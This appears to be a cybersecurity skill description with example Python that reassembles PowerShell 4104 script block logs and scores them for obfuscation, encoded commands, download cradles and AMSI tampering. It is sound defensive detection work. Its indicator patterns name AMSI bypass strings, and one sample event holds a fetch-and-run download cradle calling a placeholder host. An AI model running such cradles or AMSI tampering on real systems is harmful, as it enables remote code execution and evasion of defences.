analyzing-powershell-script-block-logging
mukul975/Anthropic-Cybersecurity-Skills
Parses Event ID 4104 script block logs from PowerShell Operational EVTX files to reconstruct multi-block commands, score risks, and flag obfuscation, Base64 payloads, download cradles, Invoke-Expression abuse, and AMSI bypass attempts for SOC hunting and detection tuning.
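As an added example (not the repository's own code), the core of such a parser in Python, working on constructed 4104 records rather than a real EVTX file: it reassembles fragmented script blocks by ScriptBlockId and MessageNumber, decodes -EncodedCommand payloads so nested indicators are visible, and scores the indicator categories the description lists. The regexes, weights and sample events are assumptions for illustration, not a tuned ruleset.

```python
import base64
import re
from collections import defaultdict

# Indicator -> (regex, weight). Categories follow the page; patterns and weights are assumed.
INDICATORS = {
    "invoke_expression": (re.compile(r"\b(Invoke-Expression|IEX)\b", re.I), 3),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 3),
    "encoded_command": (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 4),
    "amsi_tamper": (re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I), 5),
    "obfuscation": (re.compile(r"(`[a-z]){3,}|\[char\]\d+|-join\s*\(", re.I), 2),
}

# Constructed sample 4104 records (the fields an EVTX parser would yield);
# block a1 arrives as two fragments that must be joined before matching.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$c = New-Object Net.WebClient; "},
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "IEX $c.DownloadString('http://example.invalid/p.ps1')"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
]

def reassemble(events):
    """Join fragments that share a ScriptBlockId, in MessageNumber order."""
    parts = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sid: "".join(frag[n] for n in sorted(frag)) for sid, frag in parts.items()}

def to_encoded_command(script):
    """Base64(UTF-16LE) as PowerShell expects after -EncodedCommand (for building test data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_commands(text):
    """Decode -EncodedCommand payloads so indicators hidden inside them are scored too."""
    out = []
    for m in re.finditer(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", text, re.I):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-16-le", "ignore"))
        except ValueError:
            pass  # not valid Base64: the outer text is scored on its own
    return out

def score_block(text):
    """Return (risk score, sorted indicator names) for one reassembled block."""
    corpus = [text] + decode_encoded_commands(text)
    hits = sorted({n for s in corpus for n, (rx, _) in INDICATORS.items() if rx.search(s)})
    return sum(INDICATORS[h][1] for h in hits), hits
```

Feeding real records only requires mapping each EVTX event's ScriptBlockId, MessageNumber and ScriptBlockText fields into the same dictionary shape; blocks whose fragments are missing from the log will reassemble incompletely, so compare the fragment count against MessageTotal before trusting a low score.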